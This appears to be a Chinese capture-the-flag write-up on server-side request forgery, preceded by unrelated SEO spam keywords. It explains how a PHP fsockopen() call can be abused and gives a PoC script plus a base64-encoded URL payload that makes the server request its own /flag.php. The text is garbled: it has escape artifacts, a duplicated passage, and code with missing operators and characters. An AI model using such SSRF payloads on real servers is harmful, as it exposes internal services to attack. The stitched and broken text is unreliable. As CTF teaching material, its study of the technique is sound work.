网站开发技能证书,做同性恋的珠宝网站,手机浏览器下载,网站开发计入什么会计科目这题主要是引入ssrf这个漏洞攻击#xff0c;本质上没有更深入的考察
本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf
fsockopen() 函数建立与指定主机和端口的 socket 连接。然后#xff0c;它将传入的 bas…这题主要是引入ssrf这个漏洞攻击本质上没有更深入的考察
本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf
fsockopen() 函数建立与指定主机和端口的 socket 连接。然后它将传入的 base64 编码的数据解码并将数据写入到连接的 socket 中。
通过了解知道fsockopen函数就要清楚有考察ssrf的意思需要往这个方向去想
之后就是利用poc构建脚本
?php $out GET /flag.php HTTP/1.1\r\n; $out . Host: 127.0.0.1\r\n; $out . Connection: Close\r\n\r\n; echo base64_encode($out); ?
得到datahost为127.0.0.1port为80
之后就是构建url
GET /flag.php HTTP/1.1 Host: 127.0.0.1 Connection: Close
用base64加密然后构建url编码
/index.php?host127.0.0.1port80dataR0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo
